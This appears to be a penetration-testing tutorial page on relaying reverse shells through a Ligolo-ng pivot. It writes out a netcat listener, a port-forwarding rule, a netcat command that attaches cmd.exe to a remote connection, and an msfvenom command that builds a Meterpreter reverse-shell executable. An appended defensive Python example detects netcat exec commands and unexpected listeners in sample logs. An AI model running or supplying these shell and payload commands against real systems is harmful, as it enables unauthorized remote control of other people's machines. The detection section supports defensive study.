Zero Day Archives

Setup Reverse Shells through Pivot

Here's how to set up a Netcat listener and relay connections to it through a Ligolo-ng pivot, using Netcat and Metasploit:


Step 1: Set Up the Netcat Listener

First, you need to set up a Netcat listener on your local machine (Kali) to accept incoming connections.

  1. Start Netcat Listener:

    nc -nvlp 2222

    This command will listen on port 2222 on your local machine.


Step 2: Set Up the Listener Add Command

Now configure a Ligolo-ng listener that forwards any incoming connections on a different port of the pivot machine (e.g., port 1234) to port 2222 on your local machine.

  1. Listener Add Command:

    listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:2222

    • This command tells the listener to forward any incoming connections that hit port 1234 on your pivot machine to your localhost (127.0.0.1) on port 2222.

    You should see a message confirming the listener is set up and active.


Step 3: Verify the Listener is Active

You can check if the listener is active by running the following command:

  1. Check Active Listeners:

    listener_list

    This will show you the listeners that are currently active. You should see the listener set up in the previous step.


Step 4: Testing the Listener with Netcat

Now, to test that the listener works, you can attempt a connection from a remote machine (e.g., client01) using Netcat:

  1. Connect Back to Listener on your pivot machine: On the pivot machine, use the following Netcat command to connect back to your machine on port 1234, which will forward the traffic to localhost:2222.

    nc.exe -nv 10.10.120.131 1234 -e cmd.exe

    • 10.10.120.131 is the IP address of your pivot machine.

    • Port 1234 is the listener port on the pivot; traffic arriving there is forwarded to localhost:2222.

    • The -e cmd.exe option runs cmd.exe on the target machine and attaches it to the connection, providing you with a shell.


Step 5: Using Metasploit for Reverse Shell

To automate this process or use a reverse shell, you can use Metasploit to generate a payload that will connect back to your pivot machine's IP.

  1. Generate a Reverse Shell with Metasploit:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.76.14 LPORT=1234 -f exe -o shell2.exe

    • LHOST=172.16.76.14 is the IP address of your pivot machine.

    • LPORT=1234 is the listener port on the pivot, from which traffic is forwarded.

    • -o shell2.exe specifies the output filename.

  2. Execute the Payload: After transferring and executing shell2.exe on the target machine, it will establish a reverse shell connection back to your listener on port 1234, which is forwarded to localhost:2222.
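
From the defender's side, the procedure above leaves two observables: a netcat process started with -e cmd.exe on the originating host, and a listener on port 1234 of the pivot machine. The following is an added example, not part of the original page, that correlates the two over constructed sample records; the record layout, the agent.exe process name and the allow-list are assumptions.

```python
import re
import shlex

# Constructed process-creation records (Sysmon Event ID 1 style); not real logs.
PROCESS_EVENTS = [
    {"host": "client01", "image": r"C:\Users\Public\nc.exe",
     "cmdline": "nc.exe -nv 10.10.120.131 1234 -e cmd.exe"},
    {"host": "web02", "image": r"C:\Tools\ncat.exe",
     "cmdline": "ncat.exe -v 10.10.120.50 443"},
]

# Constructed listening-socket inventory per internal IP: (bind address, port, process).
LISTENERS = {
    "10.10.120.131": [("0.0.0.0", 445, "System"), ("0.0.0.0", 1234, "agent.exe")],
    "10.10.120.50": [("0.0.0.0", 443, "httpd.exe")],
}
EXPECTED = {"System", "httpd.exe"}  # assumed allow-list of legitimate service processes
NETCAT = re.compile(r"(^|\\)(nc|nc64|ncat|netcat)(\.exe)?$", re.IGNORECASE)
IPV4 = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

def parse_netcat(event):
    """Return (dest_ip, dest_port, exec_program) for a netcat exec command, else None."""
    if not NETCAT.search(event["image"]):
        return None
    args = shlex.split(event["cmdline"], posix=False)[1:]
    exec_prog, positional = None, []
    it = iter(args)
    for arg in it:
        if arg in ("-e", "--exec", "-c", "--sh-exec"):  # netcat/ncat exec flags
            exec_prog = next(it, None)
        elif not arg.startswith("-"):
            positional.append(arg)
    ips = [a for a in positional if IPV4.match(a)]
    ports = [a for a in positional if a.isdigit()]
    if exec_prog and ips and ports:
        return ips[0], int(ports[0]), exec_prog
    return None

def find_relayed_shells(events, listeners, expected):
    """Flag netcat exec events and name the process listening on the destination port."""
    findings = []
    for ev in events:
        if (parsed := parse_netcat(ev)) is None:
            continue
        ip, port, prog = parsed
        owner = next((p for _, lp, p in listeners.get(ip, []) if lp == port), None)
        # "unexpected" is also True when no listener is known for the destination.
        findings.append({"source": ev["host"], "dest": f"{ip}:{port}", "exec": prog,
                         "listener": owner, "unexpected": owner not in expected})
    return findings
```

A finding whose listener is not on the allow-list points at the host relaying the connection, which is where the forwarding agent should be looked for.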



Last updated 2 months ago